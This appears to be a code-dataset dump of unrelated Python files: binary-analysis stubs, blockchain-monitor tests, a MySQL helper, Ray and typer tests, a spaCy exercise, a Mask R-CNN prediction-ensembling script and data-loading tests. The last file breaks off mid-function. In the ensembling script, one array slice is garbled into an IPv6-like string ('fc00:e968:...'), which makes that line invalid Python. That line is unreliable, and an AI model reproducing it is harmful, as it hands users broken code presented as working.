id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
469253
|
import angr
class gethostbyname(angr.SimProcedure):
def run(self, name):
malloc = angr.SIM_PROCEDURES['libc']['malloc']
place = self.inline_call(malloc, 32).ret_expr
self.state.memory.store(place, self.state.solver.BVS('h_name', 64, key=('api', 'gethostbyname', 'h_name')), endness='Iend_LE')
self.state.memory.store(place, self.state.solver.BVS('h_aliases', 64, key=('api', 'gethostbyname', 'h_aliases')), endness='Iend_LE')
self.state.memory.store(place, self.state.solver.BVS('h_addrtype', 64, key=('api', 'gethostbyname', 'h_addrtype')), endness='Iend_LE')
self.state.memory.store(place, self.state.solver.BVS('h_length', 64, key=('api', 'gethostbyname', 'h_length')), endness='Iend_LE')
self.state.memory.store(place, self.state.solver.BVS('h_addr_list', 64, key=('api', 'gethostbyname', 'h_addr_list')), endness='Iend_LE')
return place
|
469278
|
import zmq
import time
import pytest
from queue import Queue
from threading import Thread, Event, Condition
from teos.chain_monitor import ChainMonitor, ChainMonitorStatus
from test.teos.conftest import generate_blocks, generate_blocks_with_delay
from test.teos.unit.conftest import get_random_value_hex, bitcoind_feed_params, mock_connection_refused_return
def test_init(block_processor_mock):
# Not much to test here, just sanity checks to make sure nothing goes south in the future
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
assert chain_monitor.status == ChainMonitorStatus.IDLE
assert isinstance(chain_monitor.last_tips, list) and len(chain_monitor.last_tips) == 0
assert chain_monitor.status == ChainMonitorStatus.IDLE
assert isinstance(chain_monitor.check_tip, Event)
assert isinstance(chain_monitor.lock, Condition)
assert isinstance(chain_monitor.zmqSubSocket, zmq.Socket)
assert isinstance(chain_monitor.receiving_queues[0], Queue)
assert isinstance(chain_monitor.receiving_queues[1], Queue)
def test_notify_subscribers(block_processor_mock):
queue1 = Queue()
queue2 = Queue()
chain_monitor = ChainMonitor([queue1, queue2], block_processor_mock, bitcoind_feed_params)
# Queues should be empty to start with
assert queue1.qsize() == 0
assert queue2.qsize() == 0
block1 = get_random_value_hex(32)
block2 = get_random_value_hex(32)
block3 = get_random_value_hex(32)
# we add two elements to the internal queue before the thread is started
chain_monitor.queue.put(block1)
chain_monitor.queue.put(block2)
assert queue1.qsize() == 0
assert queue2.qsize() == 0
notifying_thread = Thread(target=chain_monitor.notify_subscribers, daemon=True)
notifying_thread.start()
# the existing elements should be processed soon and in order for all queues
for q in [queue1, queue2]:
assert q.get(timeout=0.1) == block1
assert q.get(timeout=0.1) == block2
# Subscribers are only notified as long as they are awake
chain_monitor.queue.put(block3)
assert queue1.get(timeout=0.1) == block3
assert queue2.get(timeout=0.1) == block3
chain_monitor.terminate()
def test_enqueue(block_processor_mock):
# The state is updated after receiving a new block (and only if the block is not already known).
# Let's start by adding some hashes to last_tips
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
chain_monitor.last_tips = [get_random_value_hex(32) for _ in range(5)]
# Now we can try to update the state with an hash already seen and see how it doesn't work
assert chain_monitor.enqueue(chain_monitor.last_tips[0]) is False
# The state should be correctly updated with a new block hash, which should be added as last element of last_tips
another_block_hash = get_random_value_hex(32)
assert chain_monitor.enqueue(another_block_hash) is True
assert chain_monitor.last_tips[-1] == another_block_hash
def test_monitor_chain_polling(block_processor_mock, monkeypatch):
# Monkeypatch the BlockProcessor so the best tip remains unchanged
fixed_tip = get_random_value_hex(32)
monkeypatch.setattr(block_processor_mock, "get_best_block_hash", lambda blocking: fixed_tip)
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
chain_monitor.last_tips = [fixed_tip]
chain_monitor.polling_delta = 0.1
# monitor_chain_polling runs until not terminated
polling_thread = Thread(target=chain_monitor.monitor_chain_polling, daemon=True)
polling_thread.start()
# Check that nothing changes as long as a block is not generated
for _ in range(5):
assert chain_monitor.queue.empty()
time.sleep(0.1)
# And that it does if we generate a block
monkeypatch.setattr(block_processor_mock, "get_best_block_hash", lambda blocking: get_random_value_hex(32))
time.sleep(0.1)
chain_monitor.queue.get()
assert chain_monitor.queue.empty()
# Check that the bitcoind_reachable event is cleared if the connection is lost, and set once it's recovered
monkeypatch.setattr(block_processor_mock, "get_best_block_hash", mock_connection_refused_return)
time.sleep(0.5)
assert not chain_monitor.bitcoind_reachable.is_set()
monkeypatch.delattr(block_processor_mock, "get_best_block_hash")
time.sleep(0.5)
assert chain_monitor.bitcoind_reachable.is_set()
chain_monitor.terminate()
# This test needs bitcoind since the zmq interface is tested here.
def test_monitor_chain_zmq(block_processor):
responder_queue = Queue()
chain_monitor = ChainMonitor([Queue(), responder_queue], block_processor, bitcoind_feed_params)
chain_monitor.last_tips = [block_processor.get_best_block_hash()]
zmq_thread = Thread(target=chain_monitor.monitor_chain_zmq, daemon=True)
zmq_thread.start()
# The internal queue should start empty
assert chain_monitor.queue.empty()
# And have a new block every time we generate one
for _ in range(3):
generate_blocks(1)
chain_monitor.queue.get()
assert chain_monitor.queue.empty()
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
def test_monitor_chain(block_processor):
# We don't activate it but we start listening; therefore received blocks should accumulate in the internal queue
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor, bitcoind_feed_params)
chain_monitor.polling_delta = 0.1
chain_monitor.monitor_chain()
assert chain_monitor.status == ChainMonitorStatus.LISTENING
# The tip is updated before starting the threads, so it should have been added to last_tips.
assert len(chain_monitor.last_tips) > 0
# Blocks should be received and added to the queue
count = 0
for _ in range(5):
generate_blocks(1)
count += 1
time.sleep(0.11) # higher than the polling interval
assert chain_monitor.receiving_queues[0].empty()
assert chain_monitor.receiving_queues[1].empty()
assert chain_monitor.queue.qsize() == count
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
def test_monitor_chain_wrong_status_raises(block_processor_mock, monkeypatch):
# Calling monitor_chain when not idle should raise
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
for status in ChainMonitorStatus:
if status != ChainMonitorStatus.IDLE:
monkeypatch.setattr(chain_monitor, "status", status)
with pytest.raises(RuntimeError, match="can only be called in IDLE status"):
chain_monitor.monitor_chain()
# This needs bitcoind since the zmq thread is also used
def test_activate(block_processor):
# Not much to test here, this should launch two threads (one per monitor approach) and finish on terminate
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor, bitcoind_feed_params)
chain_monitor.monitor_chain()
chain_monitor.activate()
assert chain_monitor.status == ChainMonitorStatus.ACTIVE
# last_tips is updated before starting the threads, so it not be empty now.
assert len(chain_monitor.last_tips) > 0
# Blocks should be received
for _ in range(5):
generate_blocks(1)
watcher_block = chain_monitor.receiving_queues[0].get()
responder_block = chain_monitor.receiving_queues[1].get()
assert watcher_block == responder_block
assert chain_monitor.receiving_queues[0].empty()
assert chain_monitor.receiving_queues[1].empty()
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
def test_activate_wrong_status_raises(block_processor_mock):
# calling activate when not listening should raise
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
for status in ChainMonitorStatus:
if status != ChainMonitorStatus.LISTENING:
chain_monitor.status = status # mock the status
with pytest.raises(RuntimeError, match="can only be called in LISTENING status"):
chain_monitor.activate()
# This needs bitcoind since the zmq thread is also used
def test_monitor_chain_single_update(block_processor):
# This test tests that if both threads try to add the same block to the queue, only the first one will make it
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor, bitcoind_feed_params)
chain_monitor.polling_delta = 1
# We will create a block and wait for the polling thread. Then check the queues to see that the block hash has only
# been added once.
chain_monitor.monitor_chain()
chain_monitor.activate()
generate_blocks(1)
assert len(chain_monitor.receiving_queues) == 2
queue0_block = chain_monitor.receiving_queues[0].get()
queue1_block = chain_monitor.receiving_queues[1].get()
assert queue0_block == queue1_block
assert chain_monitor.receiving_queues[0].empty()
assert chain_monitor.receiving_queues[1].empty()
# The delta for polling is 1 sec, so let's wait and see
time.sleep(2)
assert chain_monitor.receiving_queues[0].empty()
assert chain_monitor.receiving_queues[1].empty()
# We can also force an update and see that it won't go through
assert chain_monitor.enqueue(queue0_block) is False
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
# This needs bitcoind since the zmq thread is also used
def test_monitor_chain_and_activate(block_processor):
# In this test, we generate some blocks after `monitor_chain`, then `activate` and generate few more blocks.
# We verify that all the generated blocks are indeed sent to the queues in the right order.
queue1 = Queue()
queue2 = Queue()
# We add some initial blocks to the receiving queues, to simulate a bootstrap with previous information
pre_blocks = [get_random_value_hex(32) for _ in range(5)]
for block in pre_blocks:
queue1.put(block)
queue2.put(block)
# We don't activate the ChainMonitor but we start listening; therefore received blocks should accumulate in the
# internal queue
chain_monitor = ChainMonitor([queue1, queue2], block_processor, bitcoind_feed_params)
chain_monitor.polling_delta = 0.1
chain_monitor.monitor_chain()
assert chain_monitor.status == ChainMonitorStatus.LISTENING
# we generate some blocks while the monitor is listening but not active
init_blocks = generate_blocks_with_delay(3, 0.15)
time.sleep(0.11) # higher than the polling interval
chain_monitor.activate()
# generate some more blocks after activating
after_blocks = generate_blocks_with_delay(3, 0.15)
# we now check that all the blocks are in the receiving queues in the correct order
all_blocks = pre_blocks + init_blocks + after_blocks
for block in all_blocks:
assert queue1.get(timeout=0.1) == block
assert queue2.get(timeout=0.1) == block
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
def test_terminate(block_processor_mock, monkeypatch):
# Test that the ChainMonitor is stopped on a terminate signal
queue = Queue()
chain_monitor = ChainMonitor([queue, Queue()], block_processor_mock, bitcoind_feed_params)
chain_monitor.polling_delta = 0.1
# Activate the monitor
chain_monitor.monitor_chain()
chain_monitor.activate()
# Ask it to terminate
chain_monitor.terminate()
assert chain_monitor.status == ChainMonitorStatus.TERMINATED
# Mock generating a block generate a new block
monkeypatch.setattr(block_processor_mock, "get_best_block_hash", lambda blocking: get_random_value_hex(32))
time.sleep(0.11) # wait longer than the polling_delta
# there should be only the ChainMonitor.END_MESSAGE message in the receiving queue, as the new block was generated
# after terminating
assert queue.qsize() == 1
assert queue.get() == ChainMonitor.END_MESSAGE
def test_threads_stop_when_terminated(block_processor):
# When status is "terminated", the methods running the threads should stop immediately
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor, bitcoind_feed_params)
chain_monitor.terminate()
# If any of the function does not exit immediately, the test will timeout
chain_monitor.monitor_chain_polling()
chain_monitor.monitor_chain_zmq()
chain_monitor.notify_subscribers()
|
469284
|
import contextlib
import os
import dotenv
import mysql.connector
import reseval
def create(config):
"""Create a local MySQL database"""
# Load environment variables
dotenv.load_dotenv(reseval.ENVIRONMENT_FILE)
# Create connection
with connect() as (_, cursor):
# Create database
# TEMPORARY - drop database
try:
cursor.execute(f'CREATE DATABASE `{config["name"]}`')
except Exception:
cursor.execute(f'DROP DATABASE `{config["name"]}`')
cursor.execute(f'CREATE DATABASE `{config["name"]}`')
# Return credentials
return {
'MYSQL_DBNAME': config['name'],
'MYSQL_HOST': os.environ['MYSQL_HOST'],
'MYSQL_USER': os.environ['MYSQL_USER'],
'MYSQL_PASS': os.environ['MYSQL_PASS']}
def destroy(config):
"""Destroy a local MySQL database"""
# Create connection
with connect() as (_, cursor):
# Destroy database
cursor.execute(f'DROP DATABASE `{config["name"]}`')
###############################################################################
# Constants
###############################################################################
@contextlib.contextmanager
def connect():
"""Connect to a local MySQL database"""
try:
# Connect to the database
connection = mysql.connector.connect(
host=os.environ['MYSQL_HOST'],
user=os.environ['MYSQL_USER'],
password=os.environ['MYSQL_PASS'])
# Create cursor to execute commands
cursor = connection.cursor()
# Execute user code
yield connection, cursor
finally:
# Close database connection
if 'cursor' in locals():
cursor.close()
if 'connection' in locals():
connection.close()
|
469296
|
import pytest
from ray.serve.utils import get_random_letters
from ray.serve.common import ReplicaName
def test_replica_tag_formatting():
deployment_tag = "DeploymentA"
replica_suffix = get_random_letters()
replica_name = ReplicaName(deployment_tag, replica_suffix)
assert replica_name.replica_tag == f"{deployment_tag}#{replica_suffix}"
assert str(replica_name) == f"{deployment_tag}#{replica_suffix}"
def test_replica_name_from_str():
replica_suffix = get_random_letters()
actor_name = f"{ReplicaName.prefix}DeploymentA#{replica_suffix}"
replica_name = ReplicaName.from_str(actor_name)
assert (
str(replica_name)
== replica_name.replica_tag
== actor_name.replace(ReplicaName.prefix, "")
)
def test_invalid_name_from_str():
replica_suffix = get_random_letters()
replica_tag = f"DeploymentA##{replica_suffix}"
with pytest.raises(AssertionError):
ReplicaName.from_str(replica_tag)
# No prefix
replica_tag = f"DeploymentA#{replica_suffix}"
with pytest.raises(AssertionError):
ReplicaName.from_str(replica_tag)
def test_is_replica_name():
replica_suffix = get_random_letters()
assert not ReplicaName.is_replica_name(f"DeploymentA##{replica_suffix}")
assert not ReplicaName.is_replica_name(f"DeploymentA#{replica_suffix}")
assert ReplicaName.is_replica_name(
f"{ReplicaName.prefix}DeploymentA#{replica_suffix}"
)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
|
469302
|
import subprocess
def test_script_help():
result = subprocess.run(
[
"coverage",
"run",
"-m",
"typer_cli",
"tests/assets/app_other_name.py",
"run",
"--help",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
assert "--name" in result.stdout
def test_script():
result = subprocess.run(
[
"coverage",
"run",
"-m",
"typer_cli",
"tests/assets/app_other_name.py",
"run",
"--name",
"Camila",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
assert "Hello Camila" in result.stdout
|
469391
|
import csv
import os
import unittest
import numpy as np
class TestCSV2RH(unittest.TestCase):
def setUp(self):
rng = np.random.RandomState(42)
self.path_to_csv = "test/test_files/utils/csv2rh/"
def _write2csv(self, fn, data):
path = os.path.join(self.path_to_csv, fn)
with open(path, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
for row in data:
writer.writerow(row)
|
469394
|
import logging
import os
import urllib.request
"""
This is a simple sample that downloads a json formatted address and writes the output to a directory
"""
class SampleProcess:
def __init__(self, uri="http://maps.googleapis.com/maps/api/geocode/json?address=google"):
self.uri = uri
@property
def logger(self):
return logging.getLogger(__name__)
def run(self, output_dir):
output_filename = os.path.join(output_dir, "sample.json")
self.logger.info("Downloading from {} to {}".format(self.uri, output_filename))
with urllib.request.urlopen(self.uri) as url:
data = url.read().decode()
self.logger.debug("Writing {} to {}", data, output_filename)
with open(output_filename, "w") as out:
out.write(data)
self.logger.info("Download complete..")
return output_filename
|
469399
|
import json
from spacy.lang.es import Spanish
from spacy.tokens import Span
from spacy.matcher import PhraseMatcher
with open("exercises/es/countries.json", encoding="utf8") as f:
COUNTRIES = json.loads(f.read())
with open("exercises/es/capitals.json", encoding="utf8") as f:
CAPITALS = json.loads(f.read())
nlp = Spanish()
matcher = PhraseMatcher(nlp.vocab)
matcher.add("COUNTRY", None, *list(nlp.pipe(COUNTRIES)))
def countries_component(doc):
# Crea un Span de entidades con el label "LOC" para todos los resultados
matches = matcher(doc)
doc.ents = [____(____, ____, ____, label=____) for match_id, start, end in matches]
return doc
# Añade el componente al pipeline
____.____(____)
print(nlp.pipe_names)
# El getter que busca el texto del span en un diccionario de ciudades
# capitales de países
get_capital = lambda span: CAPITALS.get(span.text)
# Registra la extensión de atributo del Span, "capital", con el
# getter get_capital
____.____(____, ____)
# Procesa el texto e imprime en pantalla el texto de la entidad,
# el label y los atributos "capital"
doc = nlp(
"La República Checa podría ayudar a la República Eslovaca "
"a proteger su espacio aéreo"
)
print([(____, ____, ____) for ent in doc.ents])
|
469424
|
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import multiprocessing
from functools import partial
from pathlib import Path
import skimage.io
import scipy.ndimage as ndimage
import sys, os
sys.path.insert(1, os.path.join(sys.path[0], '../pytorch-mask-rcnn'))
from adriving_util import *
from visualize import *
import skimage.morphology
import skimage.transform
from tqdm import tqdm
import pickle
import time
from unionfind import UnionFind
import json
with open('../../settings.json') as f:
setting = json.load(f)
SC_TH = 0.5
PX_TH = 50
prediction_folder_list = []
output_folder = 'dummy'
def compute_iou_masks_partial_bck(masks1, mask2):
'''Computes IoU overlaps between two sets of masks.
masks1, masks2: [Height, Width]
'''
# flatten masks
masks1 = np.reshape(masks1, (-1, masks1.shape[-1])).astype(bool)
mask2 = np.reshape(mask2, -1).astype(bool)
area1 = np.sum(masks1, axis = 0) + 1e-3
area2 = np.repeat(np.sum(mask2), masks1.shape[-1])
# return area1, area2
# intersections and union
intersections = np.dot(masks1.T, mask2)
union = area1 + area2 - intersections
overlaps = intersections / area1
return overlaps
def compute_iou_masks_partial(masks1, mask2):
'''Computes IoU overlaps between two sets of masks.
masks1, masks2: [Height, Width]
'''
# flatten masks
# mask2 = np.repeat(mask2[:, :, np.newaxis], masks1.shape[2], axis=2)
area1 = np.sum(masks1, axis = (0,1)) + 1e-3
area2 = np.array([np.sum(mask2)] * masks1.shape[2])
# return area1, area2
# intersections and union
intersections = []
for i in range(masks1.shape[2]):
intersections.append(np.sum(masks1[:, :, i] * mask2))
intersections = np.array(intersections)
# print(intersections)
union = area1 + area2 - intersections
overlaps = intersections / area1
return overlaps
def compute_iou_masksets_partial(masks1, masks2):
results = np.zeros([masks1.shape[-1], masks2.shape[-1]])
for n in range(masks2.shape[-1]):
# print(n)
results[:, n] = compute_iou_masks_partial(masks1, masks2[:, :, n])
return results
import scipy.ndimage.measurements
def remove_disconnected_instance(mask_this):
mask_label, num_features = scipy.ndimage.measurements.label(mask_this)
n_pixels = []
if num_features <= 1:
return mask_this
for n in range(np.max(mask_label)):
n_pixels.append(np.sum(mask_label==n))
n_pixels = np.array(n_pixels)
index = np.argmax(n_pixels)
return (mask_label == n)
def remove_disconnected(mask_instance):
mask_remove = np.zeros(mask_instance.shape, dtype = bool)
for n in range(mask_instance.shape[2]):
mask_remove[:, :, n] = remove_disconnected_instance(mask_instance[:, :, n])
return mask_remove
def remove_duplicates_instance_to_mask(mask, class_ids, score, PX_TH = 20, SC_TH = 0.3):
mask_resize = mask[::5, fc00:e968:6179::de52:7100, :]
iou_matrix = compute_iou_masksets_partial(mask_resize, mask_resize)
uf = UnionFind(list(range(mask.shape[2])))
overlap = list()
for i in range(mask.shape[2]):
for j in range(mask.shape[2]):
if i == j:
continue
else:
if iou_matrix[i, j] > 0.8 and class_ids[i] == class_ids[j]:
uf.union(i, j)
overlap.append(i)
overlap.append(j)
overlap = np.unique(overlap)
keep = []
for n in range(iou_matrix.shape[0]):
if n not in overlap:
keep.append(n)
# print('keep', keep)
mask_instance_new = mask[:, :, keep]
class_ids_new = list(class_ids[keep])
score_new = list(score[keep])
merged_sets = []
for n, pair in enumerate(uf.components()):
if len(pair) >= 2:
merged_sets.append(pair)
mask_instance_merged = np.zeros([mask.shape[0],
mask.shape[1], len(merged_sets)],
dtype = bool)
for n, pair in enumerate(merged_sets):
mask_instance_merged[:, :, n] = np.zeros([mask.shape[0],
mask.shape[1]],
dtype = bool)
scores_this_set = []
index_this_set = []
class_id_this_set = []
px_num_this_set = []
for p in pair:
scores_this_set.append(score[p])
index_this_set.append(p)
class_id_this_set.append(class_ids[p])
px_num_this_set.append(np.sum(mask[:, :, p], axis = (0, 1)))
index = np.argmax(np.array(scores_this_set))
mask_instance_merged[:, :, n] = mask[:, :, index_this_set[index]]
class_ids_new.append(class_id_this_set[index])
score_new.append(scores_this_set[index])
# print('before', mask_instance_new.shape)
mask_instance_new = np.dstack((mask_instance_new, mask_instance_merged))
# mask_instance_new = mask_instance_merged
class_ids_pred = np.array(class_ids_new)
scores_pred = np.array(score_new)
# print('after', mask_instance_new.shape)
n_px_per_instance = np.sum(mask_instance_new, axis = (0, 1))
instance_keep = np.where(np.logical_and((n_px_per_instance > PX_TH) , (scores_pred > SC_TH)))[0]
if len(instance_keep) == 0:
return None, None
# print(instance_keep)
instance_reorder = instance_keep[np.argsort(scores_pred[instance_keep])]
# print(instance_reorder)
score_reorder = scores_pred[instance_reorder]
class_ids_reorder = class_ids_pred[instance_reorder]
mask_reorder = mask_instance_new[:, :, instance_reorder]
mask_reorder = remove_disconnected(mask_reorder)
# print(mask_reorder.shape)
# mask_reorder = fill_and_remove(mask_reorder)
mask, instance_score = instance_to_mask(mask_reorder, class_ids_reorder,
score_reorder,
order_by_score = False)
return mask, instance_score
import skimage.morphology
def fill_and_remove(mask_instance):
selem = skimage.morphology.disk(3)
mask_instance_filled = mask_instance.copy()
for n in range(mask_instance.shape[2]):
n_pixels = np.sum(mask_instance[:, :, n])
if n_pixels > 5000:
selem = skimage.morphology.disk(3)
else:
selem = skimage.morphology.disk(1)
return mask_instance_filled
def get_prediction_from_csv(prediction, image_id):
prediction_this_image = prediction.loc[prediction['ImageId'] == image_id]
num_instances = len(prediction_this_image)
mask_pred_list = list()
# mask_pred = np.zeros([2710, 3384, num_instances], dtype = bool)
class_ids_pred = np.zeros(num_instances, dtype = int)
score_ids_pred = np.zeros(num_instances, dtype = float)
for n in range(num_instances):
rle = prediction_this_image.iloc[n]['EncodedPixels']
mask_pred_list.append(rle_decode(rle, (2710, 3384)).astype(bool))
# assert(np.sum(mask_pred[:,:, n]) == int(prediction_this_image.iloc[n]['PixelCount']))
class_ids_pred[n] = label_to_class[int(prediction_this_image.iloc[n]['LabelId'])]
score_ids_pred[n] = float(prediction_this_image.iloc[n]['Confidence'])
return mask_pred_list, class_ids_pred, score_ids_pred
def get_prediction_and_csv(prediction_folder_list, image_id):
class_ids_pred_list = []
scores_pred_list = []
mask_pred_list = []
for prediction_folder in prediction_folder_list:
if os.path.isdir(prediction_folder):
if not os.path.isfile(prediction_folder + '/'+ image_id + '.p'):
continue
with open(prediction_folder + '/'+ image_id + '.p', 'rb') as f:
prediction = pickle.load(f)
#print(prediction)
class_ids_pred = prediction['class_ids']
class_ids_pred_list += class_ids_pred.tolist()
scores_pred = prediction['scores']
scores_pred_list += scores_pred.tolist()
for n in range(len(class_ids_pred)):
mask_pred = np.zeros([2710, 3384], dtype = bool)
h, w = prediction['masks'][0].toarray().shape
if h == 2048:
mask_pred[-2048:, :] = prediction['masks'][n].toarray()[:, 100:(100+3384)]
else:
mask_recover = prediction['masks'][n].toarray()
mask_recover = skimage.transform.resize(
mask_recover, (2*h, 2*w),
order=0, mode="constant", preserve_range=True)
mask_pred[-2048:, :] = mask_recover[:, 100:(100+3384)]
mask_pred_list.append(mask_pred.astype(bool))
else:
prediction_file = pd.read_csv(prediction_folder)
image_list = list(np.unique(prediction_file.ImageId))
if image_id not in (image_list):
continue
mask_pred, class_ids_pred, scores_pred = get_prediction_from_csv(prediction_file, image_id)
class_ids_pred_list += class_ids_pred.tolist()
scores_pred_list += scores_pred.tolist()
mask_pred_list += mask_pred
return np.stack(mask_pred_list, axis = -1), np.array(class_ids_pred_list), np.array(scores_pred_list)
def read_and_rle(image_id, prediction_folder_list=prediction_folder_list,
output_folder=output_folder, SC_TH = 0.3, PX_TH = 20):
mask_pred, class_ids_pred, scores_pred = get_prediction_and_csv(prediction_folder_list, image_id)
# pipeline:
n_px_per_instance = np.sum(mask_pred, axis = (0, 1))
instance_keep = np.where(np.logical_and((n_px_per_instance > PX_TH) , (scores_pred > SC_TH)))[0]
# print(instance_keep)
if len(instance_keep) == 0:
return 0
instance_reorder = instance_keep[np.argsort(scores_pred[instance_keep])]
score_reorder = scores_pred[instance_reorder]
class_ids_reorder = class_ids_pred[instance_reorder]
mask_reorder = mask_pred[:, :, instance_reorder]
# mask_reorder = fill_and_remove(mask_reorder)
# print(class_ids_reorder)
mask, instance_score = remove_duplicates_instance_to_mask(mask_reorder, class_ids_reorder,
score_reorder,
SC_TH = SC_TH, PX_TH = PX_TH)
# pipeline_end
if mask is not None:
rle_string_list = write_mask(image_id, mask, score = instance_score)
fileoutput_name = output_folder + '/'+ image_id + '.csv'
with open(fileoutput_name, 'w+') as prediction_file:
for rle_str in rle_string_list:
prediction_file.write(rle_str)
prediction_file.write('\n')
return 0
if __name__ == '__main__':
import argparse
# Parse command line arguments
parser = argparse.ArgumentParser(
description='Train Mask R-CNN on MS COCO.')
parser.add_argument('--px_th', required=False,
default=50,
metavar="<px>",
help='px')
parser.add_argument('--sc_th', required=False,
default=0.1,
metavar="<sc>",
help='px')
args = parser.parse_args()
PX_TH = int(args.px_th)
SC_TH = float(args.sc_th)
# prediction_folder_list = ['test_resnet_v2_201806010_00_mask_th_0.5_nms_th_0.8_Scale_1_Flip_False_DT_NMS_TH_0.3',
# 'test_20180521_00_mask_th0.35_nms_th_0.6_Scale_1Flip_False',
# 'test_20180521_00_mask_th0.35_nms_th_0.6_Scale_1Flip_True',
# 'test_20180506_01_px_30sc_0.5.csvpx20_th0.5.csv' ]
prediction_folder_list = os.listdir(os.path.join('../../', setting['SUBMISSION_DIR'], 'ensemble'))
prediction_folder_list = [x for x in prediction_folder_list if not x.startswith('.')]
prediction_folder_list = [os.path.join('../../', setting['SUBMISSION_DIR'], 'ensemble', x) for x in prediction_folder_list]
print(prediction_folder_list)
# output_folder = ''
# for prediction_folder in prediction_folder_list:
# output_folder += prediction_folder + '_'
# output_folder = output_folder + '_px_{}sc_{}_ensemble_keep'.format(PX_TH, SC_TH)
output_folder = 'final_prediction' + '_px_{}sc_{}'.format(PX_TH, SC_TH)
output_folder = os.path.join('../../', setting['SUBMISSION_DIR'], output_folder)
os.makedirs(output_folder)
# output_folder = prediction_folder + '_px_{}sc_{}'.format(PX_TH, SC_TH)
image_list = []
for prediction_folder in prediction_folder_list:
if os.path.isdir(prediction_folder):
image_list_this = os.listdir(prediction_folder)
image_list_this = [x[:-2] for x in image_list_this if x[0] != '.']
else:
prediction_file = pd.read_csv(prediction_folder)
image_list_this = list(np.unique(prediction_file.ImageId))
image_list += image_list_this
image_list = list(set(image_list))
image_list = sorted(image_list)
print(len(image_list))
# image_list = image_list[195:]
n_core = min(multiprocessing.cpu_count(), 4)
with multiprocessing.Pool(n_core) as p:
r = list(tqdm(p.imap(partial(read_and_rle,
prediction_folder_list=prediction_folder_list,
output_folder=output_folder,
SC_TH = SC_TH, PX_TH = PX_TH),
image_list),
total=len(image_list)))
output_file = output_folder + '.csv'
filenames = os.listdir(output_folder)
filenames = [x for x in filenames if x[0] != '.']
filenames = sorted(filenames)
filenames = [os.path.join(output_folder, x) for x in filenames]
outfile_list = []
for fname in filenames:
with open(fname) as infile:
for line in infile:
line = line[:-1]
outfile_list.append(line.split(','))
out_file = pd.DataFrame(outfile_list, columns = ['ImageId','LabelId','Confidence','PixelCount','EncodedPixels'])
out_file['PixelCount'] = (out_file['PixelCount']).astype(int)
out_file['LabelId'] = (out_file['LabelId']).astype(int)
out_file['Confidence'] = (out_file['Confidence']).astype(float)
out_file = out_file.loc[out_file.PixelCount > PX_TH]
out_file = out_file.sort_values(['ImageId', 'Confidence'], ascending=[True, False])
out_file.to_csv(output_file, index = False)
|
469429
|
import numpy as np
import pandas as pd
import pytest
from gama.data_loading import (
arff_to_pandas,
X_y_from_file,
load_feature_metadata_from_file,
load_feature_metadata_from_arff,
sniff_csv_meta,
csv_to_pandas,
load_csv_header,
file_to_pandas,
)
NUMERIC_TYPES = [np.int, np.int32, np.int64, np.float]
# https://www.openml.org/d/23380
METADATA_23380 = {
"N": "INTEGER",
"TR": "{EL_500_20g/L,EL_500_4g/L,PP_333_20g/L,PP_333_4g/L,control,methanol_control}",
"TREE": "{D10,D13,D14,D16,D18,D19,D20,D21,D22,G10,G2,G20,G21,G24,G27,G28,G29,G4,G5,G6,G7,G8,G9,J1,J10,J12,J13,J15,J17,J19,J20,J25,J27,J29,J31,J6,J8,M10,M17,M20,M25,M33,M6,O20,O27,O28,O33,O3O,Q12,Q17,Q19,Q23,Q25,Q3,Q34,Q4,Q5}",
"BR": "{A,B,C,D,E,F,G,H,I,J}",
"TL": "REAL",
"IN": "INTEGER",
**{f"INTERNODE_{i}": "REAL" for i in range(1, 30)},
}
ARFF_BC = "tests/data/breast_cancer_train.arff"
ARFF_CJS = "tests/data/openml_d_23380.arff"
CSV_CJS_FULL = "tests/data/openml_d_23380.csv"
CSV_CJS = "tests/unit/data/openml_d_23380_500.csv"
CSV_NO_HEADER_CJS = "tests/unit/data/openml_d_23380_500_no_header.csv"
CSV_SEMICOLON_CJS = "tests/unit/data/openml_d_23380_500_semi.csv"
def _test_df_d23380(df):
assert isinstance(df, pd.DataFrame)
assert (2796, 35) == df.shape
assert 68100 == df.isnull().sum().sum()
assert 32 == sum([dtype in NUMERIC_TYPES for dtype in df.dtypes])
assert 3 == sum([dtype.name == "category" for dtype in df.dtypes])
def _test_x_y_d23380(x, y):
""" Test if types are as expected from https://www.openml.org/d/23380 """
assert isinstance(x, pd.DataFrame)
assert (2796, 34) == x.shape
assert 68100 == x.isnull().sum().sum()
assert 32 == sum([dtype in NUMERIC_TYPES for dtype in x.dtypes])
assert 2 == sum([dtype.name == "category" for dtype in x.dtypes])
assert isinstance(y, pd.Series)
assert (2796,) == y.shape
assert 0 == y.isnull().sum()
assert 6 == len(y.dtype.categories)
def _test_df_d23380_500(df):
""" Checks the properties of the subset of 500 rows of the dataset """ ""
assert isinstance(df, pd.DataFrame)
assert (500, 35) == df.shape
assert 12096 == df.isnull().sum().sum()
# data types are not checked, as the dataset contains too few rows for an
# accuracy reading
class TestXyFromFile:
def test_X_y_from_csv(self):
x, y = X_y_from_file(CSV_CJS_FULL, split_column="TR")
_test_x_y_d23380(x, y)
def test_X_y_from_arff(self):
x, y = X_y_from_file(ARFF_CJS, split_column="TR")
_test_x_y_d23380(x, y)
def test_X_y_from_file_invalid_split_column(self):
